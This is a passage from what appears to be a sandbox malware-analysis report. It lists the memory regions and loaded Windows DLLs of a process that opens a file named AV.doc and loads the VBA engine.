"c:\\windows\\system32\\usp10.dll") Region: id = 394 start_va = 0x7fffd8ab0000 end_va = 0x7fffd8b33fff monitored = 0 entry_point = 0x7fffd8ac2830 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 395 start_va = 0x7fffda400000 end_va = 0x7fffda679fff monitored = 0 entry_point = 0x7fffda41a7a0 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 396 start_va = 0x7fffdb090000 end_va = 0x7fffdb238fff monitored = 0 entry_point = 0x7fffdb0e4060 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\gdiplus.dll") Region: id = 397 start_va = 0x7fffdb330000 end_va = 0x7fffdb339fff monitored = 0 entry_point = 0x7fffdb331350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 398 start_va = 0x7fffdb350000 end_va = 0x7fffdb356fff monitored = 0 entry_point = 0x7fffdb351220 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 399 start_va = 0x7fffdc430000 end_va = 0x7fffdc43bfff monitored = 0 entry_point = 0x7fffdc4335c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 400 start_va = 0x7fffdd060000 end_va = 0x7fffdd09dfff monitored = 0 entry_point = 0x7fffdd069650 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 401 start_va = 0x7fffe1b10000 end_va = 0x7fffe1b4ffff monitored = 0 entry_point = 0x7fffe1b26c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 402 start_va = 0x7fffe1e40000 end_va = 0x7fffe2179fff monitored = 0 entry_point = 0x7fffe1e48520 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 403 start_va = 0x7fffe2180000 end_va = 0x7fffe218bfff monitored = 0 entry_point = 0x7fffe2184150 region_type = mapped_file name = "vcruntime140_1.dll" filename = "\\Windows\\System32\\vcruntime140_1.dll" (normalized: "c:\\windows\\system32\\vcruntime140_1.dll") Region: id = 404 start_va = 0x7fffe2190000 end_va = 0x7fffe2220fff monitored = 0 entry_point = 0x7fffe21e2430 region_type = mapped_file name = "msvcp140.dll" filename = "\\Windows\\System32\\msvcp140.dll" (normalized: "c:\\windows\\system32\\msvcp140.dll") Region: id = 405 start_va = 0x7fffe2230000 end_va = 0x7fffe2248fff monitored = 0 entry_point = 0x7fffe223ee50 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll") Region: id = 406 start_va = 0x7fffe3a00000 end_va = 0x7fffe3c73fff monitored = 0 entry_point = 0x7fffe3a70400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 407 start_va = 0x7fffe3ff0000 end_va = 0x7fffe40a0fff monitored = 0 entry_point = 0x7fffe40008f0 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\System32\\twinapi.dll" (normalized: "c:\\windows\\system32\\twinapi.dll") Region: id = 408 start_va = 0x7fffe5280000 end_va = 0x7fffe528dfff monitored = 0 entry_point = 0x7fffe5281460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 409 start_va = 0x7fffe64c0000 end_va = 0x7fffe6644fff monitored = 0 entry_point = 0x7fffe6506180 region_type = mapped_file name = "windows.globalization.dll" filename = "\\Windows\\System32\\Windows.Globalization.dll" (normalized: "c:\\windows\\system32\\windows.globalization.dll") Region: id = 410 start_va = 0x7fffe6650000 end_va = 0x7fffe68affff monitored = 0 entry_point = 0x7fffe66fb5b0 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll") Region: id = 411 start_va = 0x7fffe95f0000 end_va = 0x7fffe9618fff monitored = 0 entry_point = 0x7fffe95fca00 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 412 start_va = 0x7fffe9620000 end_va = 0x7fffe9b64fff monitored = 0 entry_point = 0x7fffe97ba450 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 413 start_va = 0x7fffe9b70000 end_va = 0x7fffe9ddefff monitored = 0 entry_point = 0x7fffe9c222b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 414 start_va = 0x7fffea070000 end_va = 0x7fffea0a5fff monitored = 0 entry_point = 0x7fffea080070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 415 start_va = 0x7fffea120000 end_va = 0x7fffea2d0fff monitored = 0 entry_point = 0x7fffea1b61a0 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 416 start_va = 0x7fffea2e0000 end_va = 0x7fffea381fff monitored = 0 entry_point = 0x7fffea300a40 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 417 start_va = 0x7fffea390000 end_va = 0x7fffea637fff monitored = 0 entry_point = 0x7fffea423250 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 418 start_va = 0x7fffea640000 end_va = 0x7fffea661fff monitored = 0 entry_point = 0x7fffea641a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 419 start_va = 0x7fffea750000 end_va = 0x7fffea832fff monitored = 0 entry_point = 0x7fffea787da0 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\System32\\dcomp.dll" (normalized: "c:\\windows\\system32\\dcomp.dll") Region: id = 420 start_va = 0x7fffeac50000 end_va = 0x7fffeac7ffff monitored = 0 entry_point = 0x7fffeac69b10 region_type = mapped_file name = "globinputhost.dll" filename = "\\Windows\\System32\\globinputhost.dll" (normalized: "c:\\windows\\system32\\globinputhost.dll") Region: id = 421 start_va = 0x7fffeb190000 end_va = 0x7fffeb1f6fff monitored = 0 entry_point = 0x7fffeb1ae710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 422 start_va = 0x7fffeb310000 end_va = 0x7fffeb495fff monitored = 0 entry_point = 0x7fffeb35d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 423 start_va = 0x7fffeb500000 end_va = 0x7fffeb512fff monitored = 0 entry_point = 0x7fffeb502760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 424 start_va = 0x7fffeb520000 end_va = 0x7fffeb544fff monitored = 0 entry_point = 0x7fffeb522300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 425 start_va = 0x7fffeb580000 end_va = 0x7fffeb5a4fff monitored = 0 entry_point = 0x7fffeb595220 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 426 start_va = 0x7fffeb740000 end_va = 0x7fffeb7d5fff monitored = 0 entry_point = 0x7fffeb765570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 427 start_va = 0x7fffeb8e0000 end_va = 0x7fffeb9dffff monitored = 0 entry_point = 0x7fffeb920f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 428 start_va = 0x7fffebf60000 end_va = 0x7fffec053fff monitored = 0 entry_point = 0x7fffebf6a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 429 start_va = 0x7fffec3d0000 end_va = 0x7fffec403fff monitored = 0 entry_point = 0x7fffec3eae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 430 start_va = 0x7fffec740000 end_va = 0x7fffec756fff monitored = 0 entry_point = 0x7fffec7479d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 431 start_va = 0x7fffec860000 end_va = 0x7fffec86afff monitored = 0 entry_point = 0x7fffec8619a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 432 start_va = 0x7fffec960000 end_va = 0x7fffec9b5fff monitored = 0 entry_point = 0x7fffec970bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 433 start_va = 0x7fffecaa0000 end_va = 0x7fffecaccfff monitored = 0 entry_point = 0x7fffecab9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 434 start_va = 0x7fffecc50000 end_va = 0x7fffecc78fff monitored = 0 entry_point = 0x7fffecc64530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 435 start_va = 0x7fffecdc0000 end_va = 0x7fffecdd3fff monitored = 0 entry_point = 0x7fffecdc52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 436 start_va = 0x7fffecde0000 end_va = 0x7fffece2afff monitored = 0 entry_point = 0x7fffecde35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 437 start_va = 0x7fffece40000 end_va = 0x7fffece4efff monitored = 0 entry_point = 0x7fffece43210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 438 start_va = 0x7fffece50000 end_va = 0x7fffed037fff monitored = 0 entry_point = 0x7fffece7ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 439 start_va = 0x7fffed0f0000 end_va = 0x7fffed733fff monitored = 0 entry_point = 0x7fffed2b64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 440 start_va = 0x7fffed740000 end_va = 0x7fffed7a9fff monitored = 0 entry_point = 0x7fffed776d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 441 start_va = 0x7fffed810000 end_va = 0x7fffed8c4fff monitored = 0 entry_point = 0x7fffed8522e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 442 start_va = 0x7fffed8f0000 end_va = 0x7fffed932fff monitored = 0 entry_point = 0x7fffed904b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 443 start_va = 0x7fffedba0000 end_va = 0x7fffedbfafff monitored = 0 entry_point = 0x7fffedbb38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 444 start_va = 0x7fffedc00000 end_va = 0x7fffedd59fff monitored = 0 entry_point = 0x7fffedc438e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 445 start_va = 0x7fffedd80000 end_va = 0x7fffede26fff monitored = 0 entry_point = 0x7fffedd958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 446 start_va = 0x7fffede30000 end_va = 0x7fffeded6fff monitored = 0 entry_point = 0x7fffede3b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 447 start_va = 0x7fffedee0000 end_va = 0x7fffedf31fff monitored = 0 entry_point = 0x7fffedeef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 448 start_va = 0x7fffedf50000 end_va = 0x7fffedf8afff monitored = 0 entry_point = 0x7fffedf512f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 449 start_va = 0x7fffedff0000 end_va = 0x7fffee05efff monitored = 0 entry_point = 0x7fffee015f70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 450 start_va = 0x7fffee060000 end_va = 0x7fffef5befff monitored = 0 entry_point = 0x7fffee1c11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 451 start_va = 0x7fffef9f0000 end_va = 0x7fffefc6cfff monitored = 0 entry_point = 0x7fffefac4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 452 start_va = 0x7fffefd90000 end_va = 0x7fffefeabfff monitored = 0 entry_point = 0x7fffefdd02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 453 start_va = 0x7fffefeb0000 end_va = 0x7fffeff5cfff monitored = 0 entry_point = 0x7fffefec81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 454 start_va = 0x7fffeff60000 end_va = 0x7ffff00b5fff monitored = 0 entry_point = 0x7fffeff6a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 455 start_va = 0x7ffff00c0000 end_va = 0x7ffff0180fff monitored = 0 entry_point = 0x7ffff00e0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 456 start_va = 0x7ffff0340000 end_va = 0x7ffff04c5fff monitored = 0 entry_point = 0x7ffff038ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 457 start_va = 0x7ffff0540000 end_va = 0x7ffff05aafff monitored = 0 entry_point = 0x7ffff05590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 458 start_va = 0x7ffff05b0000 end_va = 0x7ffff06f2fff monitored = 0 entry_point = 0x7ffff05d8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 459 start_va = 0x7ffff0700000 end_va = 0x7ffff079cfff monitored = 0 entry_point = 0x7ffff07078a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 460 start_va = 0x7ffff07a0000 end_va = 0x7ffff0960fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 461 start_va = 0x1fe0ca00000 end_va = 0x1fe0ca0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe0ca00000" filename = "" Region: id = 462 start_va = 0x1fe0ca10000 end_va = 0x1fe0ca1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe0ca10000" filename = "" Region: id = 463 start_va = 0x1fe0ca00000 end_va = 0x1fe0ca00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe0ca00000" filename = "" Region: id = 464 start_va = 0x7fffe0960000 end_va = 0x7fffe0b17fff monitored = 0 entry_point = 0x7fffe09ce630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 465 start_va = 0x7fffe6fe0000 end_va = 0x7fffe7361fff monitored = 0 entry_point = 0x7fffe7031220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 466 start_va = 0x1fe0ca00000 end_va = 0x1fe0ca00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe0ca00000" filename = "" Region: id = 467 start_va = 0x1fe193a0000 end_va = 0x1fe1a39ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe193a0000" filename = "" Region: id = 468 start_va = 0x1fe124f0000 end_va = 0x1fe1256ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "av.docb55c05c53cf70014dafd1a9de088deece6cf6f754c3e987bf0c384b726docdeece6cf6f754c3e987bf0c384b726doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\AV.docb55c05c53cf70014dafd1a9de088deece6cf6f754c3e987bf0c384b726docdeece6cf6f754c3e987bf0c384b726doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\av.docb55c05c53cf70014dafd1a9de088deece6cf6f754c3e987bf0c384b726docdeece6cf6f754c3e987bf0c384b726doc") Region: id = 469 start_va = 0x7fffeb660000 end_va = 0x7fffeb66cfff monitored = 0 entry_point = 0x7fffeb66307c region_type = mapped_file name = "wordcnvpxy.cnv" filename = "\\Program Files\\Microsoft Office\\Office16\\Wordcnvpxy.cnv" (normalized: "c:\\program files\\microsoft office\\office16\\wordcnvpxy.cnv") Region: id = 470 start_va = 0x7fffeb660000 end_va = 0x7fffeb66cfff monitored = 0 entry_point = 0x7fffeb66307c region_type = mapped_file name = "wordcnvpxy.cnv" filename = "\\Program Files\\Microsoft Office\\Office16\\Wordcnvpxy.cnv" (normalized: "c:\\program files\\microsoft office\\office16\\wordcnvpxy.cnv") Region: id = 471 start_va = 0x7fffeb660000 end_va = 0x7fffeb66efff monitored = 0 entry_point = 0x7fffeb662f9c region_type = mapped_file name = "recovr32.cnv" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\RECOVR32.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\recovr32.cnv") Region: id = 472 start_va = 0x7fffeb630000 end_va = 0x7fffeb656fff monitored = 0 entry_point = 0x7fffeb63efac region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 473 start_va = 0x7fffeb630000 end_va = 0x7fffeb668fff monitored = 0 entry_point = 0x7fffeb651a4c region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 474 start_va = 0x7fffeac20000 end_va = 0x7fffeac46fff monitored = 0 entry_point = 0x7fffeac2efac region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 475 start_va = 0x7fffeb620000 end_va = 0x7fffeb66efff monitored = 0 entry_point = 0x7fffeb64bd6c region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 476 start_va = 0x7fffeac20000 end_va = 0x7fffeac46fff monitored = 0 entry_point = 0x7fffeac2efac region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 477 start_va = 0x7fffeb630000 end_va = 0x7fffeb668fff monitored = 0 entry_point = 0x7fffeb651a4c region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 478 start_va = 0x7fffeac20000 end_va = 0x7fffeac46fff monitored = 0 entry_point = 0x7fffeac2efac region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 479 start_va = 0x1fe193a0000 end_va = 0x1fe1a39ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe193a0000" filename = "" Region: id = 480 start_va = 0x1fe124f0000 end_va = 0x1fe1256ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "av.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\AV.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\av.doc") Region: id = 481 start_va = 0x7fffeb620000 end_va = 0x7fffeb66efff monitored = 0 entry_point = 0x7fffeb64bd6c region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 482 start_va = 0x7fffeac20000 end_va = 0x7fffeac46fff monitored = 0 entry_point = 0x7fffeac2efac region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 483 start_va = 0x1fe193a0000 end_va = 0x1fe1a39ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe193a0000" filename = "" Region: id = 484 start_va = 0x1fe0ca10000 end_va = 0x1fe0ca18fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "av.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\AV.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\av.doc") Region: id = 485 start_va = 0x1fe193a0000 end_va = 0x1fe1a39ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe193a0000" filename = "" Region: id = 486 start_va = 0x1fe124f0000 end_va = 0x1fe1256ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "av.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\AV.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\av.doc") Region: id = 487 start_va = 0x7fffeb630000 end_va = 0x7fffeb668fff monitored = 0 entry_point = 0x7fffeb651a4c region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 488 start_va = 0x7fffeac20000 end_va = 0x7fffeac46fff monitored = 0 entry_point = 0x7fffeac2efac region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 489 start_va = 0x1fe193a0000 end_va = 0x1fe1a39ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe193a0000" filename = "" Region: id = 490 start_va = 0x1fe124f0000 end_va = 0x1fe1256ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "av.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\AV.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\av.doc") Region: id = 491 start_va = 0x7fffeb620000 end_va = 0x7fffeb66efff monitored = 0 entry_point = 0x7fffeb64bd6c region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 492 start_va = 0x7fffeac20000 end_va = 0x7fffeac46fff monitored = 0 entry_point = 0x7fffeac2efac region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 493 start_va = 0x1fe193a0000 end_va = 0x1fe1a39ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe193a0000" filename = "" Region: id = 494 start_va = 0x1fe0ca10000 end_va = 0x1fe0ca18fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "av.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\AV.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\av.doc") Region: id = 495 start_va = 0x1fe193a0000 end_va = 0x1fe1a39ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe193a0000" filename = "" Region: id = 496 start_va = 0x1fe124f0000 end_va = 0x1fe1256ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "av.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\AV.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\av.doc") Region: id = 497 start_va = 0x1fe193a0000 end_va = 0x1fe1a39ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe193a0000" filename = "" Region: id = 498 start_va = 0x1fe193a0000 end_va = 0x1fe1a39ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe193a0000" filename = "" Region: id = 499 start_va = 0x1fe124f0000 end_va = 0x1fe1256ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "~wrf{2c887faf-3815-44df-8b4d-7228c0323979}.tmp" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Word\\~WRF{2C887FAF-3815-44DF-8B4D-7228C0323979}.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\content.word\\~wrf{2c887faf-3815-44df-8b4d-7228c0323979}.tmp") Region: id = 500 start_va = 0x7fffd8240000 end_va = 0x7fffd8670fff monitored = 1 entry_point = 0x7fffd83a33cc region_type = mapped_file name = "vbe7.dll" filename = "\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common~1\\micros~1\\vba\\vba7.1\\vbe7.dll") Region: id = 501 start_va = 0x1fe0ca10000 end_va = 0x1fe0ca11fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe0ca10000" filename = "" Region: id = 502 start_va = 0x65590000 end_va = 0x65661fff monitored = 0 entry_point = 0x655b14e4 region_type = mapped_file name = "msvcr100.dll" filename = 